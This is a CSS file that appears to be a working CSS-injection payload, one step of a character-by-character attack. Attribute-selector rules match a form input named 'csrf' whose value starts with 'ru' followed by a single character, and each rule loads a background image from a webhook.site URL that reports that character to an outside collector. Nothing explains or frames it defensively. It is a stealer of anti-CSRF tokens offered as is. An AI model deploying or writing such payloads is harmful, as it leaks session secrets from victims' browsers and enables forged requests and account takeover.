/* ru */
input[name="csrf"][value^="rua"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=a'); }
input[name="csrf"][value^="rub"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=b'); }
input[name="csrf"][value^="ruc"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=c'); }
input[name="csrf"][value^="rud"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=d'); }
input[name="csrf"][value^="rue"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=e'); }
input[name="csrf"][value^="ruf"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=f'); }
input[name="csrf"][value^="rug"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=g'); }
input[name="csrf"][value^="ruh"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=h'); }
input[name="csrf"][value^="rui"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=i'); }
input[name="csrf"][value^="ruj"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=j'); }
input[name="csrf"][value^="ruk"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=k'); }
input[name="csrf"][value^="rul"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=l'); }
input[name="csrf"][value^="rum"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=m'); }
input[name="csrf"][value^="run"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=n'); }
input[name="csrf"][value^="ruo"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=o'); }
input[name="csrf"][value^="rup"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=p'); }
input[name="csrf"][value^="ruq"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=q'); }
input[name="csrf"][value^="rur"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=r'); }
input[name="csrf"][value^="rus"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=s'); }
input[name="csrf"][value^="rut"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=t'); }
input[name="csrf"][value^="ruu"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=u'); }
input[name="csrf"][value^="ruv"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=v'); }
input[name="csrf"][value^="ruw"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=w'); }
input[name="csrf"][value^="rux"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=x'); }
input[name="csrf"][value^="ruy"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=y'); }
input[name="csrf"][value^="ruz"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=z'); }
input[name="csrf"][value^="ruA"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=A'); }
input[name="csrf"][value^="ruB"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=B'); }
input[name="csrf"][value^="ruC"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=C'); }
input[name="csrf"][value^="ruD"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=D'); }
input[name="csrf"][value^="ruE"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=E'); }
input[name="csrf"][value^="ruF"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=F'); }
input[name="csrf"][value^="ruG"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=G'); }
input[name="csrf"][value^="ru0"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=0'); }
input[name="csrf"][value^="ru1"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=1'); }
input[name="csrf"][value^="ru2"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=2'); }
input[name="csrf"][value^="ru3"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=3'); }
input[name="csrf"][value^="ru4"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=4'); }
input[name="csrf"][value^="ru5"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=5'); }
input[name="csrf"][value^="ru6"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=6'); }
input[name="csrf"][value^="ru7"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=7'); }
input[name="csrf"][value^="ru8"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=8'); }
input[name="csrf"][value^="ru9"] { background: url('https://webhook.site/77eba2a5-48bb-480e-849e-688956362f73?c=9'); }